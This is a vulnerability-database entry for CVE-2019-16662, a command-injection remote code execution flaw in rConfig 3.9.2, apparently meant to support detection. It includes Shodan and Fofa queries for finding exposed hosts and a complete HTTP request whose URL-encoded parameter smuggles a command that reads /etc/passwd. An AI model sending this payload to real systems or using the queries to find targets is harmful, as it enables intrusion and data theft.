🔙 목록으로 돌아가기

CVE-2019-16662: rConfig 3.9.2 - Remote Code Execution

TitlerConfig 3.9.2 - Remote Code Execution
Authorpikpikcu
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected system.
RemediationUpgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94452
CVE IDCVE-2019-16662
CWE IDCWE-78
Shodan Queryhttp.title:"rconfig"
Fofa Querytitle="rconfig"
Tags cve2019 cve intrusive rconfig packetstorm rce vkev vuln

🔍 Vulnerability Description

rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.

🌐 HTTP Request

GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16662.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-16662.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A